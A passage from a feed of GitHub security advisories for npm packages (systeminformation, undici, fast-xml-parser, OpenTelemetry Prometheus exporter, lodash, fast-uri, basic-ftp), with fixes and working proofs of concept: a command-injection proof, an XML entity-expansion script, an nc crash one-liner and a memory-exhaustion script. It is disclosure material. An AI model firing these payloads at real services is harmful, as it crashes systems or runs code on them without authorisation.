(not executable)\ntouch /tmp/SI_RCE_PROOF \u2192 ATTACKER\u0027S COMMAND EXECUTES\n/bin/postgres -V \u2192 runs normally, returns version\n```\n\n### Step 5 \u2014 Verify Code Execution\n\n```\nls -la /tmp/SI_RCE_PROOF\n# -rw-rw-r-- 1 appuser appuser 0 Feb 14 15:30 /tmp/SI_RCE_PROOF\n```\n\nThe file exists. Arbitrary command execution confirmed.\n\nThe injected command runs with **whatever privileges the Node.js process has**. In a monitoring dashboard or backend API context, that\u0027s typically the application service account.\n\n---\n\n## Real-World Attack Scenarios\n\n### Scenario 1 \u2014 Shared Hosting / Multi-Tenant Server\n\nA low-privileged user on a shared server creates the malicious file in `/tmp` or their home directory. The hosting provider runs a monitoring agent that uses `systeminformation` for health dashboards. Next time the agent calls `versions()`, the attacker\u0027s command executes under the monitoring agent\u0027s (higher-privileged) service account.\n\n### Scenario 2 \u2014 CI/CD Pipeline Poisoning\n\nA malicious contributor submits a PR that includes a build step creating files with crafted names. If the CI pipeline uses `systeminformation` for environment reporting (common in test harnesses and build dashboards), the injected commands execute in the CI runner context \u2014 potentially leaking secrets, tokens, and deployment keys.\n\n### Scenario 3 \u2014 Container / Kubernetes Escape\n\nIn containerized environments where `/var` or `/tmp` sits on a shared volume, a compromised container creates the malicious file. When the host-level monitoring agent (running `systeminformation`) calls `versions()`, the injected command executes on the host, breaking out of the container boundary.\n\n---\n\n## Suggested Fix\n\nReplace `exec()` with `execFile()` for the PostgreSQL binary version check. `execFile()` does not spawn a shell, so metacharacters in the path are treated as literal characters:\n\n```javascript\nconst { execFile } = require(\u0027child_process\u0027);\n\nexec(\u0027locate bin/postgres\u0027, (error, stdout) =\u003e {\n if (!error) {\n const postgresqlBin = stdout.toString().split(\u0027\\n\u0027)\n .filter(p =\u003e p.trim().length \u003e 0)\n .sort();\n if (postgresqlBin.length) {\n execFile(postgresqlBin[postgresqlBin.length - 1], [\u0027-V\u0027], (error, stdout) =\u003e {\n // ... parse version\n });\n }\n }\n});\n```\n\nAdditionally, the locate output should be validated against a safe path pattern before use:\n\n```javascript\nconst safePath = /^[a-zA-Z0-9/_.-]+$/;\nconst postgresqlBin = stdout.toString().split(\u0027\\n\u0027)\n .filter(p =\u003e safePath.test(p.trim()))\n .sort();\n```\n\n---\n\n## Disclosure\n\n- **Reported via:** GitHub Private Security Advisory\n- **Advisory URL:** https://github.com/sebhildebrandt/systeminformation/security/advisories/new\n- **Security Contact:** security@systeminformation.io",
"id": "GHSA-5vv4-hvf7-2h46",
"modified": "2026-02-19T21:57:18Z",
"published": "2026-02-18T22:36:50Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/sebhildebrandt/systeminformation/security/advisories/GHSA-5vv4-hvf7-2h46"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26318"
},
{
"type": "WEB",
"url": "https://github.com/sebhildebrandt/systeminformation/commit/b67d3715eec881038ccbaace2f2711419ac3e107"
},
{
"type": "PACKAGE",
"url": "https://github.com/sebhildebrandt/systeminformation"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Command Injection via Unsanitized `locate` Output in `versions()` \u2014 systeminformation"
}
GHSA-F269-VFMQ-VJVJ
Vulnerability from github – Published: 2026-03-13 20:07 – Updated: 2026-03-13 20:07Impact
A server can reply with a WebSocket frame using the 64-bit length form and an extremely large length. undici's ByteParser overflows internal math, ends up in an invalid state, and throws a fatal TypeError that terminates the process.
Patches
Patched in the undici version v7.24.0 and v6.24.0. Users should upgrade to this version or later.
Workarounds
There are no workarounds.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "undici"
},
"ranges": [
{
"events": [
{
"introduced": "6.0.0"
},
{
"fixed": "6.24.0"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "undici"
},
"ranges": [
{
"events": [
{
"introduced": "7.0.0"
},
{
"fixed": "7.24.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-1528"
],
"database_specific": {
"cwe_ids": [
"CWE-1284",
"CWE-248"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-13T20:07:26Z",
"nvd_published_at": "2026-03-12T21:16:25Z",
"severity": "HIGH"
},
"details": "### Impact\nA server can reply with a WebSocket frame using the 64-bit length form and an extremely large length. undici\u0027s ByteParser overflows internal math, ends up in an invalid state, and throws a fatal TypeError that terminates the process. \n\n### Patches\n\n\n Patched in the undici version v7.24.0 and v6.24.0. Users should upgrade to this version or later.\n\n### Workarounds\n\nThere are no workarounds.",
"id": "GHSA-f269-vfmq-vjvj",
"modified": "2026-03-13T20:07:26Z",
"published": "2026-03-13T20:07:26Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/nodejs/undici/security/advisories/GHSA-f269-vfmq-vjvj"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1528"
},
{
"type": "WEB",
"url": "https://hackerone.com/reports/3537648"
},
{
"type": "WEB",
"url": "https://cna.openjsf.org/security-advisories.html"
},
{
"type": "PACKAGE",
"url": "https://github.com/nodejs/undici"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "Undici: Malicious WebSocket 64-bit length overflows parser and crashes the client"
}
GHSA-8GC5-J5RX-235R
Vulnerability from github – Published: 2026-03-17 19:45 – Updated: 2026-03-25 14:31Summary
The fix for CVE-2026-26278 added entity expansion limits (maxTotalExpansions, maxExpandedLength, maxEntityCount, maxEntitySize) to prevent XML entity expansion Denial of Service. However, these limits are only enforced for DOCTYPE-defined entities. Numeric character references (&#NNN; and &#xHH;) and standard XML entities (<, >, etc.) are processed through a separate code path that does NOT enforce any expansion limits.
An attacker can use massive numbers of numeric entity references to completely bypass all configured limits, causing excessive memory allocation and CPU consumption.
Affected Versions
fast-xml-parser v5.x through v5.5.3 (and likely v5.5.5 on npm)
Root Cause
In src/xmlparser/OrderedObjParser.js, the replaceEntitiesValue() function has two separate entity replacement loops:
- Lines 638-670: DOCTYPE entities — expansion counting with
entityExpansionCountandcurrentExpandedLengthtracking. This was the CVE-2026-26278 fix. - Lines 674-677:
lastEntitiesloop — replaces standard entities includingnum_dec(/&#([0-9]{1,7});/g) andnum_hex(/&#x([0-9a-fA-F]{1,6});/g). This loop has NO expansion counting at all.
The numeric entity regex replacements at lines 97-98 are part of lastEntities and go through the uncounted loop, completely bypassing the CVE-2026-26278 fix.
Proof of Concept
const { XMLParser } = require('fast-xml-parser');
// Even with strict explicit limits, numeric entities bypass them
const parser = new XMLParser({
processEntities: {
enabled: true,
maxTotalExpansions: 10,
maxExpandedLength: 100,
maxEntityCount: 1,
maxEntitySize: 10
}
});
// 100K numeric entity references — should be blocked by maxTotalExpansions=10
const xml = `<root>${'A'.repeat(100000)}</root>`;
const result = parser.parse(xml);
// Output: 500,000 chars — bypasses maxExpandedLength=100 completely
console.log('Output length:', result.root.length); // 500000
console.log('Expected max:', 100); // limit was 100
Results:
- 100K A references → 500,000 char output (5x default maxExpandedLength of 100,000)
- 1M references → 5,000,000 char output, ~147MB memory consumed
- Even with maxTotalExpansions=10 and maxExpandedLength=100, 10K references produce 50,000 chars
- Hex entities (A) exhibit the same bypass
Impact
Denial of Service — An attacker who can provide XML input to applications using fast-xml-parser can cause: - Excessive memory allocation (147MB+ for 1M entity references) - CPU consumption during regex replacement - Potential process crash via OOM
This is particularly dangerous because the application developer may have explicitly configured strict entity expansion limits believing they are protected, while numeric entities silently bypass all of them.
Suggested Fix
Apply the same entityExpansionCount and currentExpandedLength tracking to the lastEntities loop (lines 674-677) and the HTML entities loop (lines 680-686), similar to how DOCTYPE entities are tracked at lines 638-670.
Workaround
Set htmlEntities:false
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "fast-xml-parser"
},
"ranges": [
{
"events": [
{
"introduced": "5.0.0"
},
{
"fixed": "5.5.6"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "fast-xml-parser"
},
"ranges": [
{
"events": [
{
"introduced": "4.0.0-beta.3"
},
{
"fixed": "4.5.5"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-33036"
],
"database_specific": {
"cwe_ids": [
"CWE-776"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-17T19:45:41Z",
"nvd_published_at": "2026-03-20T06:16:11Z",
"severity": "HIGH"
},
"details": "## Summary\n\nThe fix for CVE-2026-26278 added entity expansion limits (`maxTotalExpansions`, `maxExpandedLength`, `maxEntityCount`, `maxEntitySize`) to prevent XML entity expansion Denial of Service. However, these limits are only enforced for DOCTYPE-defined entities. **Numeric character references** (`\u0026#NNN;` and `\u0026#xHH;`) and standard XML entities (`\u0026lt;`, `\u0026gt;`, etc.) are processed through a separate code path that does NOT enforce any expansion limits.\n\nAn attacker can use massive numbers of numeric entity references to completely bypass all configured limits, causing excessive memory allocation and CPU consumption.\n\n## Affected Versions\n\nfast-xml-parser v5.x through v5.5.3 (and likely v5.5.5 on npm)\n\n## Root Cause\n\nIn `src/xmlparser/OrderedObjParser.js`, the `replaceEntitiesValue()` function has two separate entity replacement loops:\n\n1. **Lines 638-670**: DOCTYPE entities \u2014 expansion counting with `entityExpansionCount` and `currentExpandedLength` tracking. This was the CVE-2026-26278 fix.\n2. **Lines 674-677**: `lastEntities` loop \u2014 replaces standard entities including `num_dec` (`/\u0026#([0-9]{1,7});/g`) and `num_hex` (`/\u0026#x([0-9a-fA-F]{1,6});/g`). **This loop has NO expansion counting at all.**\n\nThe numeric entity regex replacements at lines 97-98 are part of `lastEntities` and go through the uncounted loop, completely bypassing the CVE-2026-26278 fix.\n\n## Proof of Concept\n\n```javascript\nconst { XMLParser } = require(\u0027fast-xml-parser\u0027);\n\n// Even with strict explicit limits, numeric entities bypass them\nconst parser = new XMLParser({\n processEntities: {\n enabled: true,\n maxTotalExpansions: 10,\n maxExpandedLength: 100,\n maxEntityCount: 1,\n maxEntitySize: 10\n }\n});\n\n// 100K numeric entity references \u2014 should be blocked by maxTotalExpansions=10\nconst xml = `\u003croot\u003e${\u0027\u0026#65;\u0027.repeat(100000)}\u003c/root\u003e`;\nconst result = parser.parse(xml);\n\n// Output: 500,000 chars \u2014 bypasses maxExpandedLength=100 completely\nconsole.log(\u0027Output length:\u0027, result.root.length); // 500000\nconsole.log(\u0027Expected max:\u0027, 100); // limit was 100\n```\n\n**Results:**\n- 100K `\u0026#65;` references \u2192 500,000 char output (5x default maxExpandedLength of 100,000)\n- 1M references \u2192 5,000,000 char output, ~147MB memory consumed\n- Even with `maxTotalExpansions=10` and `maxExpandedLength=100`, 10K references produce 50,000 chars\n- Hex entities (`\u0026#x41;`) exhibit the same bypass\n\n## Impact\n\n**Denial of Service** \u2014 An attacker who can provide XML input to applications using fast-xml-parser can cause:\n- Excessive memory allocation (147MB+ for 1M entity references)\n- CPU consumption during regex replacement\n- Potential process crash via OOM\n\nThis is particularly dangerous because the application developer may have explicitly configured strict entity expansion limits believing they are protected, while numeric entities silently bypass all of them.\n\n## Suggested Fix\n\nApply the same `entityExpansionCount` and `currentExpandedLength` tracking to the `lastEntities` loop (lines 674-677) and the HTML entities loop (lines 680-686), similar to how DOCTYPE entities are tracked at lines 638-670.\n\n## Workaround\n\nSet `htmlEntities:false`",
"id": "GHSA-8gc5-j5rx-235r",
"modified": "2026-03-25T14:31:39Z",
"published": "2026-03-17T19:45:41Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-8gc5-j5rx-235r"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33036"
},
{
"type": "WEB",
"url": "https://github.com/NaturalIntelligence/fast-xml-parser/commit/bd26122c838e6a55e7d7ac49b4ccc01a49999a01"
},
{
"type": "PACKAGE",
"url": "https://github.com/NaturalIntelligence/fast-xml-parser"
},
{
"type": "WEB",
"url": "https://github.com/NaturalIntelligence/fast-xml-parser/releases/tag/v4.5.5"
},
{
"type": "WEB",
"url": "https://github.com/NaturalIntelligence/fast-xml-parser/releases/tag/v5.5.6"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "fast-xml-parser affected by numeric entity expansion bypassing all entity expansion limits (incomplete fix for CVE-2026-26278)"
}
GHSA-Q7RR-3CGH-J5R3
Vulnerability from github – Published: 2026-05-11 14:42 – Updated: 2026-06-08 23:42Summary
A single malformed HTTP request crashes any Node.js process running the OpenTelemetry JS Prometheus exporter. The metrics endpoint (default 0.0.0.0:9464) has no error handling around URL parsing, so a request with an invalid URI causes an uncaught TypeError that terminates the process.
You are affected by this vulnerability if either of the following apply to your application:
- you directly use
@opentelemetry/exporter-prometheusin your code through its built-in server. - your
OTEL_METRICS_EXPORTERenvironment variable includesprometheusAND - you use
@opentelemetry/sdk-node - you use
@opentelemetry/auto-instrumentations-nodevia--require @opentelemetry/auto-instrumentations-node/register/--import @opentelemetry/auto-instrumentations-node/register
Impact
Denial of service. Any application using the OpenTelemetry Prometheus exporter’s built-in server can be crashed by a single unauthenticated network packet sent to the metrics port. No authentication, special privileges, or prior access is required.
Remediation
Update to the fixed version
Update @opentelemetry/exporter-prometheus and @opentelemetry/sdk-node to version 0.217.0 or later.
Update @opentelemetry/auto-instrumentations-node to version 0.75.0 or later.
This release adds proper error handling around the URL constructor, returning an HTTP 400 response on parse failure rather than allowing the exception to propagate and crash the process.
npm install @opentelemetry/exporter-prometheus@latest
Do Not Expose the Endpoint to Untrusted Users
[!IMPORTANT] The following mitigations reduce exposure but do not fully remediate the vulnerability. Any client that can reach the metrics endpoint - including your own Prometheus scraper host if compromised - could still trigger the crash. Updating to 0.217.0 is the recommended resolution.
If updating is not immediately feasible, restrict access to the metrics endpoint so that it is not reachable by untrusted or unauthenticated network clients. For example:
-
Bind to localhost only by setting the
hostoption to127.0.0.1when configuring thePrometheusExporter, so the port is not exposed on public or shared network interfaces -
Use a firewall or network policy to restrict access to port
9464(or whichever port you have configured) to only trusted Prometheus scrape hosts -
Place the endpoint behind a reverse proxy that filters or validates incoming requests before they reach the exporter
Details
In PrometheusExporter.ts, the _requestHandler calls new URL(request.url, this._baseUrl) without any error handling. Node's HTTP parser accepts absolute-form URIs (e.g. http://) for proxy compatibility, including malformed ones. When request.url is "http://", the URL constructor throws TypeError: Invalid URL. Since there is no try-catch in the handler, the exception propagates as an uncaught exception and crashes the process.
The Prometheus metrics endpoint is unauthenticated by design (Prometheus scrapes it) and binds to 0.0.0.0 by default, meaning it is reachable by any network client that can connect to the metrics port.
Proof of Concept
Start any Node.js application with the Prometheus exporter running on the default port 9464, then send a single raw TCP packet:
echo -ne 'GET http:// HTTP/1.1\r\nHost: localhost\r\n\r\n' | nc localhost 9464
The process crashes immediately with:
TypeError: Invalid URL
at new URL (...)
at PrometheusExporter._requestHandler (...)
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "@opentelemetry/exporter-prometheus"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.217.0"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "@opentelemetry/sdk-node"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.217.0"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "@opentelemetry/auto-instrumentations-node"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.75.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-44902"
],
"database_specific": {
"cwe_ids": [
"CWE-755"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-11T14:42:10Z",
"nvd_published_at": "2026-05-27T15:16:29Z",
"severity": "HIGH"
},
"details": "## Summary\n\nA single malformed HTTP request crashes any Node.js process running the OpenTelemetry JS Prometheus exporter. The metrics endpoint (default `0.0.0.0:9464`) has no error handling around URL parsing, so a request with an invalid URI causes an uncaught `TypeError` that terminates the process.\n\n**You are affected by this vulnerability if either of the following apply to your application:**\n\n* you directly use `@opentelemetry/exporter-prometheus` in your code through its built-in server.\n* your `OTEL_METRICS_EXPORTER` environment variable includes `prometheus` **AND**\n * you use `@opentelemetry/sdk-node`\n * you use `@opentelemetry/auto-instrumentations-node` via `--require @opentelemetry/auto-instrumentations-node/register`/`--import @opentelemetry/auto-instrumentations-node/register`\n\n## Impact\n\n**Denial of service.** Any application using the OpenTelemetry Prometheus exporter\u2019s built-in server can be crashed by a single unauthenticated network packet sent to the metrics port. No authentication, special privileges, or prior access is required.\n\n## Remediation\n\n### Update to the fixed version\n\nUpdate `@opentelemetry/exporter-prometheus` and `@opentelemetry/sdk-node` to version **0.217.0** or later. \nUpdate `@opentelemetry/auto-instrumentations-node` to version **0.75.0** or later.\n\nThis release adds proper error handling around the URL constructor, returning an HTTP `400` response on parse failure rather than allowing the exception to propagate and crash the process.\n\n```\nnpm install @opentelemetry/exporter-prometheus@latest\n```\n\n### Do Not Expose the Endpoint to Untrusted Users\n\n\u003e [!IMPORTANT] \n\u003e The following mitigations reduce exposure but do not fully remediate the vulnerability. Any client that *can* reach the metrics endpoint - including your own Prometheus scraper host if compromised - could still trigger the crash. Updating to **0.217.0** is the recommended resolution.\n\nIf updating is not immediately feasible, restrict access to the metrics endpoint so that it is not reachable by untrusted or unauthenticated network clients. For example:\n\n* **Bind to localhost only** by setting the `host` option to `127.0.0.1` when configuring the `PrometheusExporter`, so the port is not exposed on public or shared network interfaces\n\n* **Use a firewall or network policy** to restrict access to port `9464` (or whichever port you have configured) to only trusted Prometheus scrape hosts\n\n* **Place the endpoint behind a reverse proxy** that filters or validates incoming requests before they reach the exporter\n\n## Details\n\nIn `PrometheusExporter.ts`, the `_requestHandler` calls `new URL(request.url, this._baseUrl)` without any error handling. Node\u0027s HTTP parser accepts absolute-form URIs (e.g. `http://`) for proxy compatibility, including malformed ones. When `request.url` is `\"http://\"`, the `URL` constructor throws `TypeError: Invalid URL`. Since there is no try-catch in the handler, the exception propagates as an uncaught exception and crashes the process.\n\nThe Prometheus metrics endpoint is unauthenticated by design (Prometheus scrapes it) and binds to `0.0.0.0` by default, meaning it is reachable by any network client that can connect to the metrics port.\n\n## Proof of Concept\n\nStart any Node.js application with the Prometheus exporter running on the default port `9464`, then send a single raw TCP packet:\n\n```\necho -ne \u0027GET http:// HTTP/1.1\\r\\nHost: localhost\\r\\n\\r\\n\u0027 | nc localhost 9464\n```\n\nThe process crashes immediately with:\n\n```\nTypeError: Invalid URL\n at new URL (...)\n at PrometheusExporter._requestHandler (...)\n```",
"id": "GHSA-q7rr-3cgh-j5r3",
"modified": "2026-06-08T23:42:14Z",
"published": "2026-05-11T14:42:10Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/open-telemetry/opentelemetry-js/security/advisories/GHSA-q7rr-3cgh-j5r3"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44902"
},
{
"type": "PACKAGE",
"url": "https://github.com/open-telemetry/opentelemetry-js"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "Prometheus exporter process crash via malformed HTTP request"
}
GHSA-R5FR-RJXR-66JC
Vulnerability from github – Published: 2026-04-01 23:51 – Updated: 2026-04-01 23:51Impact
The fix for CVE-2021-23337 added validation for the variable option in _.template but did not apply the same validation to options.imports key names. Both paths flow into the same Function() constructor sink.
When an application passes untrusted input as options.imports key names, an attacker can inject default-parameter expressions that execute arbitrary code at template compilation time.
Additionally, _.template uses assignInWith to merge imports, which enumerates inherited properties via for..in. If Object.prototype has been polluted by any other vector, the polluted keys are copied into the imports object and passed to Function().
Patches
Users should upgrade to version 4.18.0.
The fix applies two changes:
1. Validate importsKeys against the existing reForbiddenIdentifierChars regex (same check already used for the variable option)
2. Replace assignInWith with assignWith when merging imports, so only own properties are enumerated
Workarounds
Do not pass untrusted input as key names in options.imports. Only use developer-controlled, static key names.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 4.17.23"
},
"package": {
"ecosystem": "npm",
"name": "lodash"
},
"ranges": [
{
"events": [
{
"introduced": "4.0.0"
},
{
"fixed": "4.18.0"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 4.17.23"
},
"package": {
"ecosystem": "npm",
"name": "lodash-es"
},
"ranges": [
{
"events": [
{
"introduced": "4.0.0"
},
{
"fixed": "4.18.0"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 4.17.23"
},
"package": {
"ecosystem": "npm",
"name": "lodash-amd"
},
"ranges": [
{
"events": [
{
"introduced": "4.0.0"
},
{
"fixed": "4.18.0"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "lodash.template"
},
"ranges": [
{
"events": [
{
"introduced": "4.0.0"
},
{
"fixed": "4.18.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-4800"
],
"database_specific": {
"cwe_ids": [
"CWE-94"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-01T23:51:12Z",
"nvd_published_at": "2026-03-31T20:16:29Z",
"severity": "HIGH"
},
"details": "### Impact\n\nThe fix for [CVE-2021-23337](https://github.com/advisories/GHSA-35jh-r3h4-6jhm) added validation for the `variable` option in `_.template` but did not apply the same validation to `options.imports` key names. Both paths flow into the same `Function()` constructor sink.\n\nWhen an application passes untrusted input as `options.imports` key names, an attacker can inject default-parameter expressions that execute arbitrary code at template compilation time.\n\nAdditionally, `_.template` uses `assignInWith` to merge imports, which enumerates inherited properties via `for..in`. If `Object.prototype` has been polluted by any other vector, the polluted keys are copied into the imports object and passed to `Function()`.\n\n### Patches\n\nUsers should upgrade to version 4.18.0.\n\nThe fix applies two changes:\n1. Validate `importsKeys` against the existing `reForbiddenIdentifierChars` regex (same check already used for the `variable` option)\n2. Replace `assignInWith` with `assignWith` when merging imports, so only own properties are enumerated\n\n### Workarounds\n\nDo not pass untrusted input as key names in `options.imports`. Only use developer-controlled, static key names.",
"id": "GHSA-r5fr-rjxr-66jc",
"modified": "2026-04-01T23:51:12Z",
"published": "2026-04-01T23:51:12Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/lodash/lodash/security/advisories/GHSA-r5fr-rjxr-66jc"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4800"
},
{
"type": "WEB",
"url": "https://github.com/lodash/lodash/commit/3469357cff396a26c363f8c1b5a91dde28ba4b1c"
},
{
"type": "WEB",
"url": "https://cna.openjsf.org/security-advisories.html"
},
{
"type": "ADVISORY",
"url": "https://github.com/advisories/GHSA-35jh-r3h4-6jhm"
},
{
"type": "PACKAGE",
"url": "https://github.com/lodash/lodash"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "lodash vulnerable to Code Injection via `_.template` imports key names"
}
GHSA-V39H-62P7-JPJC
Vulnerability from github – Published: 2026-05-08 19:13 – Updated: 2026-05-08 19:13Impact
fast-uri v3.1.1 and earlier decodes percent-encoded authority delimiters (%40 as @, %3A as :) inside the host component and serializes them back as raw characters. This changes the URI structure, turning a hostname into userinfo plus a different host.
For example, http://trusted.com%40evil.com/ normalizes to http://trusted.com@evil.com/, which reparses as host evil.com with userinfo trusted.com.
Applications that normalize untrusted URLs before host allowlist checks, redirect validation, or outbound request routing can be steered to a different authority than the original URL appeared to contain.
Patches
Upgrade to fast-uri >= 3.1.2.
Workarounds
None. Upgrade to the patched version.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 3.1.1"
},
"package": {
"ecosystem": "npm",
"name": "fast-uri"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.1.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-6322"
],
"database_specific": {
"cwe_ids": [
"CWE-436"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-08T19:13:01Z",
"nvd_published_at": "2026-05-05T11:16:33Z",
"severity": "HIGH"
},
"details": "### Impact\n\n`fast-uri` v3.1.1 and earlier decodes percent-encoded authority delimiters (`%40` as `@`, `%3A` as `:`) inside the host component and serializes them back as raw characters. This changes the URI structure, turning a hostname into userinfo plus a different host.\n\nFor example, `http://trusted.com%40evil.com/` normalizes to `http://trusted.com@evil.com/`, which reparses as host `evil.com` with userinfo `trusted.com`.\n\nApplications that normalize untrusted URLs before host allowlist checks, redirect validation, or outbound request routing can be steered to a different authority than the original URL appeared to contain.\n\n### Patches\n\nUpgrade to `fast-uri` \u003e= 3.1.2.\n\n### Workarounds\n\nNone. Upgrade to the patched version.",
"id": "GHSA-v39h-62p7-jpjc",
"modified": "2026-05-08T19:13:01Z",
"published": "2026-05-08T19:13:01Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/fastify/fast-uri/security/advisories/GHSA-v39h-62p7-jpjc"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-6322"
},
{
"type": "WEB",
"url": "https://cna.openjsf.org/security-advisories.html"
},
{
"type": "PACKAGE",
"url": "https://github.com/fastify/fast-uri"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "fast-uri vulnerable to host confusion via percent-encoded authority delimiters"
}
GHSA-RP42-5VXX-QPWR
Vulnerability from github – Published: 2026-04-16 21:37 – Updated: 2026-04-24 21:02Summary
basic-ftp@5.2.2 is vulnerable to denial of service through unbounded memory growth while processing directory listings from a remote FTP server. A malicious or compromised server can send an extremely large or never-ending listing response to Client.list(), causing the client process to consume memory until it becomes unstable or crashes.
Details
The issue is in the package's default directory listing flow.
Client.list() reaches dist/Client.js, where the full listing response is downloaded into a StringWriter before parsing:
File: dist/Client.js:516-527
async _requestListWithCommand(command) {
const buffer = new StringWriter_1.StringWriter();
await (0, transfer_1.downloadTo)(buffer, {
ftp: this.ftp,
tracker: this._progressTracker,
command,
remotePath: "",
type: "list"
});
const text = buffer.getText(this.ftp.encoding);
this.ftp.log(text);
return this.parseList(text);
}
The vulnerable sink is StringWriter, which grows an in-memory Buffer with no limit:
File: dist/StringWriter.js:5-20
class StringWriter extends stream_1.Writable {
constructor() {
super(...arguments);
this.buf = Buffer.alloc(0);
}
_write(chunk, _, callback) {
if (chunk instanceof Buffer) {
this.buf = Buffer.concat([this.buf, chunk]);
callback(null);
}
else {
callback(new Error("StringWriter expects chunks of type 'Buffer'."));
}
}
getText(encoding) {
return this.buf.toString(encoding);
}
}
The critical operation is:
this.buf = Buffer.concat([this.buf, chunk]);
There is no maximum size check, no truncation, and no streaming parser. Because the remote FTP server controls the listing response, it can force the client to keep allocating memory until the process is terminated.
How it happens:
- An application connects to an attacker-controlled or compromised FTP server.
- The application calls
client.list(). - The server returns an extremely large or unbounded directory listing.
basic-ftpbuffers the full response inStringWriter.- Memory grows without bound due to repeated
Buffer.concat(...)calls.
PoC
The following PoC exercises the vulnerable buffering primitive directly:
const { StringWriter } = require("basic-ftp/dist/StringWriter.js");
function mb(n) {
return Math.round(n / 1024 / 1024) + "MB";
}
const writer = new StringWriter();
let wrote = 0;
for (let i = 0; i < 32; i++) {
const chunk = Buffer.alloc(4 * 1024 * 1024, 0x41);
writer.write(chunk);
wrote += chunk.length;
if ((i + 1) % 8 === 0) {
const m = process.memoryUsage();
console.log("written", mb(wrote), "rss", mb(m.rss), "heap", mb(m.heapUsed), "buf", mb(m.arrayBuffers));
}
}
console.log("final text len", writer.getText("utf8").length);
Observed output:
written 32MB rss 116MB heap 4MB buf 64MB
written 64MB rss 296MB heap 4MB buf 240MB
written 96MB rss 340MB heap 3MB buf 284MB
written 128MB rss 436MB heap 3MB buf 376MB
final text len 134217728
This demonstrates sustained memory growth in the same code path used to buffer directory listing data.
Supporting files saved alongside this report:
poc.jspoc_output.txt
Impact
This is a denial-of-service vulnerability affecting applications that use basic-ftp to list directories from remote FTP servers.
- Vulnerability class: Memory exhaustion / Denial of Service
- Attack precondition: The victim connects to a malicious or compromised FTP server and performs
Client.list() - Impacted users: Any application or service using
basic-ftp@5.2.2against untrusted FTP endpoints - Security effect: The attacker can cause excessive memory consumption, process instability, and potential process termination
Recommended remediation:
- Enforce a maximum listing size.
- Abort transfers that exceed the configured limit.
- Prefer incremental or streaming parsing over full-response buffering.
Example defensive check:
if (this.buf.length + chunk.length > MAX_LISTING_BYTES) {
callback(new Error("FTP listing exceeds maximum allowed size."));
return;
}
this.buf = Buffer.concat([this.buf, chunk]);
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 5.2.2"
},
"package": {
"ecosystem": "npm",
"name": "basic-ftp"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "5.3.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-41324"
],
"database_specific": {
"cwe_ids": [
